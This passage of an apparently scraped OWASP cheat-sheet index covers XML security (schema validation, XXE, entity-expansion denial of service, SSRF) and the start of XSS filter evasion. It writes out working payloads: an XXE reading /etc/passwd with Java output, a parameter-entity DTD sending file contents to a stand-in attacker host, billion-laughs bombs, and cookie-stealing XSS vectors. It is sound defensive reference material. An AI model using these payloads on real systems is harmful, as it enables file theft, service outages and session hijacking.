<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"buy\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:positiveInteger\"/>\n</xs:sequence>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#general-data-restrictions","title":"General Data Restrictions","text":"

After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#prefixed-values","title":"Prefixed Values","text":"

Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect allow-list scenario for an application: only specific values will be accepted. Such a constraint is called enumeration in XML schema. The following example restricts the contents of the element month to 12 possible values:

<xs:element name=\"month\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:enumeration value=\"January\"/>\n<xs:enumeration value=\"February\"/>\n<xs:enumeration value=\"March\"/>\n<xs:enumeration value=\"April\"/>\n<xs:enumeration value=\"May\"/>\n<xs:enumeration value=\"June\"/>\n<xs:enumeration value=\"July\"/>\n<xs:enumeration value=\"August\"/>\n<xs:enumeration value=\"September\"/>\n<xs:enumeration value=\"October\"/>\n<xs:enumeration value=\"November\"/>\n<xs:enumeration value=\"December\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

By limiting the month element's value to any of the previous values, the application will not be manipulating random strings.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#ranges","title":"Ranges","text":"

Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:

<xs:element name=\"name\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:minLength value=\"3\"/>\n<xs:maxLength value=\"256\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:

<xs:element name=\"name\">\n<xs:simpleType>\n<xs:restriction base=\"xs:string\">\n<xs:length value=\"8\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#patterns","title":"Patterns","text":"

Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:

<xs:element name=\"SSN\">\n<xs:simpleType>\n<xs:restriction base=\"xs:token\">\n<xs:pattern value=\"[0-9]{3}-[0-9]{2}-[0-9]{4}\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

Only numbers between 000-00-0000 and 999-99-9999 will be allowed as values for a SSN.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#assertions","title":"Assertions","text":"

Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable $value can be used to reference the contents of the value being analyzed. The Divide by Zero section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:

<xs:element name=\"denominator\">\n<xs:simpleType>\n<xs:restriction base=\"xs:integer\">\n<xs:assertion test=\"$value != 0\"/>\n</xs:restriction>\n</xs:simpleType>\n</xs:element>\n

The assertion guarantees that the denominator will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#occurrences","title":"Occurrences","text":"

The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: minOccurs and maxOccurs. The default value for both the minOccurs and the maxOccurs attributes is 1, but certain elements may require other values. For instance, if a value is optional, it could contain a minOccurs of 0, and if there is no limit on the maximum amount, it could contain a maxOccurs of unbounded, as in the following example:

<xs:schema xmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\n<xs:element name=\"operation\">\n<xs:complexType>\n<xs:sequence>\n<xs:element name=\"buy\" maxOccurs=\"unbounded\">\n<xs:complexType>\n<xs:all>\n<xs:element name=\"id\" type=\"xs:integer\"/>\n<xs:element name=\"price\" type=\"xs:decimal\"/>\n<xs:element name=\"quantity\" type=\"xs:integer\"/>\n</xs:all>\n</xs:complexType>\n</xs:element>\n</xs:complexType>\n</xs:element>\n</xs:schema>\n

The previous schema includes a root element named operation, which can contain an unlimited (unbounded) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#jumbo-payloads","title":"Jumbo Payloads","text":"

Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#traditional-jumbo-payloads","title":"Traditional Jumbo Payloads","text":"

There are two primary methods to make a document larger than normal:

In most cases, the overall result will be a huge document. This is a short example of what this looks like:

<SOAPENV:ENVELOPE XMLNS:SOAPENV=\"HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/\"\nXMLNS:EXT=\"HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL\">\n<SOAPENV:HEADER LARGENAME1=\"LARGEVALUE\"\nLARGENAME2=\"LARGEVALUE2\"\nLARGENAME3=\"LARGEVALUE3\" \u2026>\n...\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#small-jumbo-payloads","title":"\"Small\" Jumbo Payloads","text":"

The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:

<?xml version=\"1.0\"?>\n<!DOCTYPE root [\n <!ENTITY file SYSTEM \"http://attacker/huge.xml\" >\n]>\n<root>&file;</root>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#schema-poisoning","title":"Schema Poisoning","text":"

When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#local-schema-poisoning","title":"Local Schema Poisoning","text":"

Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#embedded-schema","title":"Embedded Schema","text":"

The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :

<?xml version=\"1.0\"?>\n<!DOCTYPE note [\n <!ELEMENT note (to,from,heading,body)>\n<!ELEMENT to (#PCDATA)>\n<!ELEMENT from (#PCDATA)>\n<!ELEMENT heading (#PCDATA)>\n<!ELEMENT body (#PCDATA)>\n]>\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contain a way to check the embedded schema integrity to be used safely. Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#incorrect-permissions","title":"Incorrect Permissions","text":"

You can often circumvent the risk of using remotely tampered versions by processing a local schema.

<!DOCTYPE note SYSTEM \"note.dtd\">\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:

-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd\n

The permissions set on name.dtd allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#remote-schema-poisoning","title":"Remote Schema Poisoning","text":"

Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network's traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#man-in-the-middle-mitm-attack","title":"Man-in-the-Middle (MitM) Attack","text":"

When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:

<!DOCTYPE note SYSTEM \"http://example.com/note.dtd\">\n<note>\n<to>Tove</to>\n<from>Jani</from>\n<heading>Reminder</heading>\n<body>Don't forget me this weekend</body>\n</note>\n

The remote file note.dtd could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#dns-cache-poisoning","title":"DNS-Cache Poisoning","text":"

Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.

The previous example referenced the host example.com using an unencrypted protocol.

When switching to HTTPS, the location of the remote schema will look like https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:

$\u00a0host\u00a0example.com\nexample.com\u00a0has\u00a0address\u00a01.1.1.1\n

If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker 2.2.2.2:

$\u00a0host\u00a0example.com\nexample.com\u00a0has\u00a0address\u00a02.2.2.2\n

When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#evil-employee-attack","title":"Evil Employee Attack","text":"

When third parties host and define schemas, the contents are not under the control of the schemas' users. Any modifications introduced by a malicious employee-or an external attacker in control of these files-could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xml-entity-expansion","title":"XML Entity Expansion","text":"

If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#sample-vulnerable-java-implementations","title":"Sample Vulnerable Java Implementations","text":"

Using the DTD capabilities of referencing local or remote files it is possible to affect the confidentiality. In addition, it is also possible to affect the availability of the resources if no proper restrictions have been set for the entities expansion. Consider the following example code of an XXE.

Sample XML:

<!DOCTYPE contacts SYSTEM \"contacts.dtd\">\n<contacts>\n<contact>\n<firstname>John</firstname>\n<lastname>&xxe;</lastname>\n</contact>\n</contacts>\n

Sample DTD:

<!ELEMENT contacts (contact*)>\n<!ELEMENT contact (firstname,lastname)>\n<!ELEMENT firstname (#PCDATA)>\n<!ELEMENT lastname ANY>\n<!ENTITY xxe SYSTEM \"/etc/passwd\">\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-dom","title":"XXE using DOM","text":"
import java.io.IOException;\nimport javax.xml.parsers.DocumentBuilder;\nimport javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException;\nimport org.xml.sax.InputSource;\nimport org.w3c.dom.Document;\nimport org.w3c.dom.Element;\nimport org.w3c.dom.Node;\nimport org.w3c.dom.NodeList;\n\npublic class parseDocument {\npublic static void main(String[] args) {\ntry {\nDocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();\nDocumentBuilder builder = factory.newDocumentBuilder();\nDocument doc = builder.parse(new InputSource(\"contacts.xml\"));\nNodeList nodeList = doc.getElementsByTagName(\"contact\");\nfor (int s = 0; s < nodeList.getLength(); s++) {\nNode firstNode = nodeList.item(s);\nif (firstNode.getNodeType() == Node.ELEMENT_NODE) {\nElement firstElement = (Element) firstNode;\nNodeList firstNameElementList = firstElement.getElementsByTagName(\"firstname\");\nElement firstNameElement = (Element) firstNameElementList.item(0);\nNodeList firstName = firstNameElement.getChildNodes();\nSystem.out.println(\"First Name: \"  + ((Node) firstName.item(0)).getNodeValue());\nNodeList lastNameElementList = firstElement.getElementsByTagName(\"lastname\");\nElement lastNameElement = (Element) lastNameElementList.item(0);\nNodeList lastName = lastNameElement.getChildNodes();\nSystem.out.println(\"Last Name: \" + ((Node) lastName.item(0)).getNodeValue());\n}\n}\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ javac parseDocument.java ; java parseDocument\nFirst Name: John\nLast Name: ### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-dom4j","title":"XXE using DOM4J","text":"
import org.dom4j.Document;\nimport org.dom4j.DocumentException;\nimport org.dom4j.io.SAXReader;\nimport org.dom4j.io.OutputFormat;\nimport org.dom4j.io.XMLWriter;\n\npublic class test1 {\npublic static void main(String[] args) {\nDocument document = null;\ntry {\nSAXReader reader = new SAXReader();\ndocument = reader.read(\"contacts.xml\");\n} catch (Exception e) {\ne.printStackTrace();\n}\nOutputFormat format = OutputFormat.createPrettyPrint();\ntry {\nXMLWriter writer = new XMLWriter( System.out, format );\nwriter.write( document );\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ java test1\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE contacts SYSTEM \"contacts.dtd\">\n\n<contacts>\n <contact>\n  <firstname>John</firstname>\n  <lastname>### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-sax","title":"XXE using SAX","text":"
import java.io.IOException;\nimport javax.xml.parsers.SAXParser;\nimport javax.xml.parsers.SAXParserFactory;\nimport org.xml.sax.SAXException;\nimport org.xml.sax.helpers.DefaultHandler;\n\npublic class parseDocument extends DefaultHandler {\npublic static void main(String[] args) {\nnew parseDocument();\n}\npublic parseDocument() {\ntry {\nSAXParserFactory factory = SAXParserFactory.newInstance();\nSAXParser parser = factory.newSAXParser();\nparser.parse(\"contacts.xml\", this);\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n@Override\npublic void characters(char[] ac, int i, int j) throws SAXException {\nString tmpValue = new String(ac, i, j);\nSystem.out.println(tmpValue);\n}\n}\n

The previous code produces the following output:

$ java parseDocument\nJohn\n#### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#xxe-using-stax","title":"XXE using StAX","text":"
import javax.xml.parsers.SAXParserFactory;\nimport javax.xml.stream.XMLStreamReader;\nimport javax.xml.stream.XMLInputFactory;\nimport java.io.File;\nimport java.io.FileReader;\nimport java.io.FileInputStream;\n\npublic class parseDocument {\npublic static void main(String[] args) {\ntry {\nXMLInputFactory xmlif = XMLInputFactory.newInstance();\nFileReader fr = new FileReader(\"contacts.xml\");\nFile file = new File(\"contacts.xml\");\nXMLStreamReader xmlfer = xmlif.createXMLStreamReader(\"contacts.xml\",\nnew FileInputStream(file));\nint eventType = xmlfer.getEventType();\nwhile (xmlfer.hasNext()) {\neventType = xmlfer.next();\nif(xmlfer.hasText()){\nSystem.out.print(xmlfer.getText());\n}\n}\nfr.close();\n} catch (Exception e) {\ne.printStackTrace();\n}\n}\n}\n

The previous code produces the following output:

$ java parseDocument\n<!DOCTYPE contacts SYSTEM \"contacts.dtd\">John### User Database\n...\nnobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false\nroot:*:0:0:System Administrator:/var/root:/bin/sh\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#recursive-entity-reference","title":"Recursive Entity Reference","text":"

When the definition of an element A is another element B, and that element B is defined as element A, that schema describes a circular reference between elements:

<!DOCTYPE A [\n <!ELEMENT A ANY>\n<!ENTITY A \"<A>&B;</A>\">\n <!ENTITY B \"&A;\">\n]>\n<A>&A;</A>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#quadratic-blowup","title":"Quadratic Blowup","text":"

Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)).

The result of the following attack will be 100,000 x 100,000 characters in memory.

<!DOCTYPE root [\n <!ELEMENT root ANY>\n<!ENTITY A \"AAAAA...(a 100.000 A's)...AAAAA\">\n]>\n<root>&A;&A;&A;&A;...(a 100.000 &A;'s)...&A;&A;&A;&A;&A;</root>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#billion-laughs","title":"Billion Laughs","text":"

When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:

<!DOCTYPE root [\n <!ELEMENT root ANY>\n<!ENTITY LOL \"LOL\">\n<!ENTITY LOL1 \"&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;\">\n<!ENTITY LOL2 \"&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;\">\n<!ENTITY LOL3 \"&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;\">\n<!ENTITY LOL4 \"&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;\">\n<!ENTITY LOL5 \"&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;\">\n<!ENTITY LOL6 \"&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;\">\n<!ENTITY LOL7 \"&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;\">\n<!ENTITY LOL8 \"&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;\">\n<!ENTITY LOL9 \"&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;\">\n]>\n<root>&LOL9;</root>\n

The entity LOL9 will be resolved as the 10 entities defined in LOL8; then each of these entities will be resolved in LOL7 and so on. Finally, the CPU and/or memory will be affected by parsing the 3 x 10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash.

The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages.

The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:

<?XML VERSION=\"1.0\" ENCODING=\"UTF-8\"?>\n<!DOCTYPE SOAP-ENV:ENVELOPE [\n <!ELEMENT SOAP-ENV:ENVELOPE ANY>\n<!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED>\n<!ENTITY LOL \"LOL\">\n<!ENTITY LOL1 \"&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;\">\n<!ENTITY LOL2 \"&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;\">\n<!ENTITY LOL3 \"&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;\">\n<!ENTITY LOL4 \"&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;&LOL3;\">\n<!ENTITY LOL5 \"&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;&LOL4;\">\n<!ENTITY LOL6 \"&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;&LOL5;\">\n<!ENTITY LOL7 \"&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;&LOL6;\">\n<!ENTITY LOL8 \"&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;&LOL7;\">\n<!ENTITY LOL9 \"&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;&LOL8;\">\n]>\n<SOAP:ENVELOPE ENTITYREFERENCE=\"&LOL9;\"\nXMLNS:SOAP=\"HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/\">\n<SOAP:BODY>\n<KEYWORD XMLNS=\"URN:PARASOFT:WS:STORE\">FOO</KEYWORD>\n</SOAP:BODY>\n</SOAP:ENVELOPE>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#reflected-file-retrieval","title":"Reflected File Retrieval","text":"

Consider the following example code of an XXE:

<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<!DOCTYPE root [\n <!ELEMENT includeme ANY>\n<!ENTITY xxe SYSTEM \"/etc/passwd\">\n]>\n<root>&xxe;</root>\n

The previous XML defines an entity named xxe, which is in fact the contents of /etc/passwd, which will be expanded within the includeme tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#server-side-request-forgery","title":"Server Side Request Forgery","text":"

Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#external-dns-resolution","title":"External DNS Resolution","text":"

Sometimes is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. This is one of the simplest forms of SSRF, but requires the attacker to analyze the DNS traffic. Burp has a plugin that checks for this attack.

<!DOCTYPE m PUBLIC \"-//B/A/EN\" \"http://checkforthisspecificdomain.example.com\">\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#external-connection","title":"External Connection","text":"

Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE root [\n <!ENTITY % xxe SYSTEM \"http://attacker/evil.dtd\">\n%xxe;\n]>\n
"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#file-retrieval-with-parameter-entities","title":"File Retrieval with Parameter Entities","text":"

Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:

<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<!DOCTYPE root [\n <!ENTITY % file SYSTEM \"file:///etc/passwd\">\n<!ENTITY % dtd SYSTEM \"http://attacker/evil.dtd\">\n%dtd;\n]>\n<root>&send;</root>\n

Here the DTD defines two external parameter entities: file loads a local file, and dtd which loads a remote DTD. The remote DTD should contain something like this:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!ENTITY % all \"<!ENTITY send SYSTEM 'http://example.com/?%file;'>\">\n%all;\n

The second DTD causes the system to send the contents of the file back to the attacker's server as a parameter of the URL.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#port-scanning","title":"Port Scanning","text":"

The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:

1) Complete Disclosure: The simplest and most unusual scenario, with complete disclosure you can clearly see what's going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.

2) Error-based: If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection:

java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80\n at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)\n at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)\n

3) Timeout-based: Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.

4) Time-based: Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.

"},{"location":"cheatsheets/XML_Security_Cheat_Sheet.html#brute-forcing","title":"Brute Forcing","text":"

Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the username and password as part of the URI scheme (http, ftp, etc). For example the following :

<!DOCTYPE root [\n <!ENTITY user SYSTEM \"http://username:password@example.com:8080\">\n]>\n<root>&user;</root>\n
"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html","title":"XSS Filter Evasion Cheat Sheet","text":""},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake, from his seminal XSS Cheat Sheet, which was at: http://ha.ckers.org/xss.html. That site now redirects to its new home here, where we plan to maintain and enhance it. The very first OWASP Prevention Cheat Sheet, the Cross Site Scripting Prevention Cheat Sheet, was inspired by RSnake's XSS Cheat Sheet, so we can thank RSnake for our inspiration. We wanted to create short, simple guidelines that developers could follow to prevent XSS, rather than simply telling developers to build apps that could protect against all the fancy tricks specified in rather complex attack cheat sheet, and so the OWASP Cheat Sheet Series was born.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#tests","title":"Tests","text":"

This cheat sheet lists a series of XSS attacks that can be used to bypass certain XSS defensive filters. Please note that input filtering is an incomplete defense for XSS which these tests can be used to illustrate.

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#basic-xss-test-without-filter-evasion","title":"Basic XSS Test Without Filter Evasion","text":"

This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

<SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#xss-locator-polygot","title":"XSS Locator (Polygot)","text":"

The following is a \"polygot test XSS payload.\" This test will execute in multiple contexts including html, script string, js and URL. Thank you to Gareth Heyes for this contribution.

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#malformed-a-tags","title":"Malformed A Tags","text":"

Skip the HREF attribute and get to the meat of the XXS... Submitted by David Cross \\~ Verified on Chrome

\\<a onmouseover=\"alert(document.cookie)\"\\>xxs link\\</a\\>

or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

\\<a onmouseover=alert(document.cookie)\\>xxs link\\</a\\>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#malformed-img-tags","title":"Malformed IMG Tags","text":"

Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tags:

<IMG\u00a0\"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"\\>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#fromcharcode","title":"fromCharCode","text":"

If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

"},{"location":"cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html#default-src-tag-to-get-past-filters-that-check-src-domain","title":"Default SRC Tag to Get Past Filters that Check SRC Domain","text":"

This will bypass most SRC domain filters. Inserting JavaScript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur, onclick giving you an extensive amount of variations for many injections listed here. Submitted by David Cross .

Edited by Abdullah Hussam(@Abdulahhusam).

<IMG SRC=# onmouseover=\"alert('xxs')\">

